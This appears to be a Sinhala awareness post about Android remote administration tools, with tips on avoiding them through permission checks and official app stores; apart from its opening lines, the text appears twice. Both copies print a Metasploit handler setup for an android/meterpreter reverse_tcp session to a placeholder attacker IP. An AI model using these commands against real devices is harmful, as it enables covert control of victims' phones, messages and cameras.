ගොඩ දෙනෙක් මේ ගැන දැනුවත් නෑ කියල හිතුන නිසා මේක දාන්න හිතුවෙ
දැනුවත් අයත් ඇති
විවේචනය කිරීම ඔබේ අයිතියක්..
:-) හොද විවේචන බලාපොරොත්තු වෙනවා
හරි මුලින් බලමු hacker කෙනෙක්ට මේක කරන්න පුලුවන් ක්රමවේද ගැන
මේක කරන්න hacker කෙනෙක් සාමාන්යයෙන් බාවිතා කරන්නේ rat එකක් ඒ කියන්නේ ( Remote administration tool ) එකක් උදාහරණයක් විදිහට අපි android මෙහෙයුම් පද්දතියෙන් දාවනය වන device එකක් ගමු. මෙතනදී හැකර් android මෙහෙයුම් පද්දතියට අදාල වන ලෙස Rat එක සාදා ගනු ලබනවා මෙහිදී ඔහු ඔහුගේ ip ලිපිනය හා සම්බන්ද විය යුතු port එක එම Rat එකට අඩන්ගු කරනවා.
ඊට පස්සෙ කරන්නේ මේක victime ගෙ අතට පත් කරන එක. මේක android වලට සීමා උන දෙයක් පමනක් නෙවෙයි windows. Apple ඕනේම platform එකකට සිදු කරන්න හැකියාවක් තියනවා. ඉතින් දැන් අපි victime කෙනෙක් උනා කියල හිතමු අපි මේ Rat එක ස්තාපනය කරගත් සැනින් hacker ට අපේ ජන්ගම දුරකතනය පාලනය කරන්න හැකියාවක් ලැබෙනවා මෙය සිදු කරන්න පුලුවන් අපි අන්තර්ජාලයට සම්බන්ද වූ විට පමනයි . අපි ස්තාපනය කරගත් Rat එක අපි අන්තර්ජාලයට සම්බන්ද වූ සැනිනි hacker ඇතුලත් කරන ලද ip ලිපිනයට හා port එකට සම්බන්ද (connect ) වීමට උත්සාහ කරනවා .ඉතුරු ටික තියෙන්නේ හැකර්ගෙ අතේ.
ඔහුට ඔබගේ දුරකතනයට සම්බන්ද වීමට අවශ්ය වන්නේ line 6 ක පුන්චි code එකක් පමනයි metasploit නම්
Use multi/handler
Set payload android/meterpreter/reverse_tcp
Set LHOST හැකර්ගෙ IP ලිපිනය
Set LPORT port එක
exploit
දැන් බලමු හැකර්ට කරන්න පුලුවන් දේවල් ගැන
ඔහුට ඔබේ
Message කියවන්න
Contact list එකට acess වෙන්න
Camera ව පාලනය කරන්න
ඔයාගේ දුරකතනයෙන් messages යවන්න තව ගොඩක් දේවල් කරන්න පුලුවන්.
හරි දැන් බලමු කොහොමද මේ වාගෙ දේවලින් වැලකෙන්නේ කියලා
හරි අපි උදාහරණයක් විදිහට android device එකක් ගමු සෑම app එකක්ම ස්තාපනය කිරීමේදී එයට අවශ්ය වෙන permissions ගැන සැලකිලිමත් විය යුතුයි. මේ ක්රමය ගොඩක් සාර්තක නෑ මොකද හැකර් කෙනෙකුට අවශ්ය පරදි මේ permissions වෙනස් කරන්න පුලුවන්
අනිත් දෙය හැකි සෑම විටම අපිට අවශ්ය app එක playstore. AppStore වගේ දෙයකින් බාගත් කරගන්න සැලකිලිමත් වෙන්න ඕනේ
Hacker කෙනෙකුට මෙම rat එක ඕනෑම තවත් app එකකට bind කිරීමට අවශ්ය වන්නේ සරල ruby script එකක් පමනයි ඒ නිසා අපි සෑම විටම app ලබාගැනීමට එම app නිර්මානය කල අයගේ web අඩවිය හෝ playstore වැනි දේ බාවිත කල හොත් අපිට මෙවැනි දේ වලින් වැලකිය හැකියි
- කරුනාකර කතු අයිතිය සුරකින්න -
දැනුවත් අයත් ඇති
විවේචනය කිරීම ඔබේ අයිතියක්..
:-) හොද විවේචන බලාපොරොත්තු වෙනවා
හරි මුලින් බලමු hacker කෙනෙක්ට මේක කරන්න පුලුවන් ක්රමවේද ගැන
මේක කරන්න hacker කෙනෙක් සාමාන්යයෙන් බාවිතා කරන්නේ rat එකක් ඒ කියන්නේ ( Remote administration tool ) එකක් උදාහරණයක් විදිහට අපි android මෙහෙයුම් පද්දතියෙන් දාවනය වන device එකක් ගමු. මෙතනදී හැකර් android මෙහෙයුම් පද්දතියට අදාල වන ලෙස Rat එක සාදා ගනු ලබනවා මෙහිදී ඔහු ඔහුගේ ip ලිපිනය හා සම්බන්ද විය යුතු port එක එම Rat එකට අඩන්ගු කරනවා.
ඊට පස්සෙ කරන්නේ මේක victime ගෙ අතට පත් කරන එක. මේක android වලට සීමා උන දෙයක් පමනක් නෙවෙයි windows. Apple ඕනේම platform එකකට සිදු කරන්න හැකියාවක් තියනවා. ඉතින් දැන් අපි victime කෙනෙක් උනා කියල හිතමු අපි මේ Rat එක ස්තාපනය කරගත් සැනින් hacker ට අපේ ජන්ගම දුරකතනය පාලනය කරන්න හැකියාවක් ලැබෙනවා මෙය සිදු කරන්න පුලුවන් අපි අන්තර්ජාලයට සම්බන්ද වූ විට පමනයි . අපි ස්තාපනය කරගත් Rat එක අපි අන්තර්ජාලයට සම්බන්ද වූ සැනිනි hacker ඇතුලත් කරන ලද ip ලිපිනයට හා port එකට සම්බන්ද (connect ) වීමට උත්සාහ කරනවා .ඉතුරු ටික තියෙන්නේ හැකර්ගෙ අතේ.
ඔහුට ඔබගේ දුරකතනයට සම්බන්ද වීමට අවශ්ය වන්නේ line 6 ක පුන්චි code එකක් පමනයි metasploit නම්
Use multi/handler
Set payload android/meterpreter/reverse_tcp
Set LHOST හැකර්ගෙ IP ලිපිනය
Set LPORT port එක
exploit
දැන් බලමු හැකර්ට කරන්න පුලුවන් දේවල් ගැන
ඔහුට ඔබේ
Message කියවන්න
Contact list එකට acess වෙන්න
Camera ව පාලනය කරන්න
ඔයාගේ දුරකතනයෙන් messages යවන්න තව ගොඩක් දේවල් කරන්න පුලුවන්.
හරි දැන් බලමු කොහොමද මේ වාගෙ දේවලින් වැලකෙන්නේ කියලා
හරි අපි උදාහරණයක් විදිහට android device එකක් ගමු සෑම app එකක්ම ස්තාපනය කිරීමේදී එයට අවශ්ය වෙන permissions ගැන සැලකිලිමත් විය යුතුයි. මේ ක්රමය ගොඩක් සාර්තක නෑ මොකද හැකර් කෙනෙකුට අවශ්ය පරදි මේ permissions වෙනස් කරන්න පුලුවන්
අනිත් දෙය හැකි සෑම විටම අපිට අවශ්ය app එක playstore. AppStore වගේ දෙයකින් බාගත් කරගන්න සැලකිලිමත් වෙන්න ඕනේ
Hacker කෙනෙකුට මෙම rat එක ඕනෑම තවත් app එකකට bind කිරීමට අවශ්ය වන්නේ සරල ruby script එකක් පමනයි ඒ නිසා අපි සෑම විටම app ලබාගැනීමට එම app නිර්මානය කල අයගේ web අඩවිය හෝ playstore වැනි දේ බාවිත කල හොත් අපිට මෙවැනි දේ වලින් වැලකිය හැකියි
- කරුනාකර කතු අයිතිය සුරකින්න -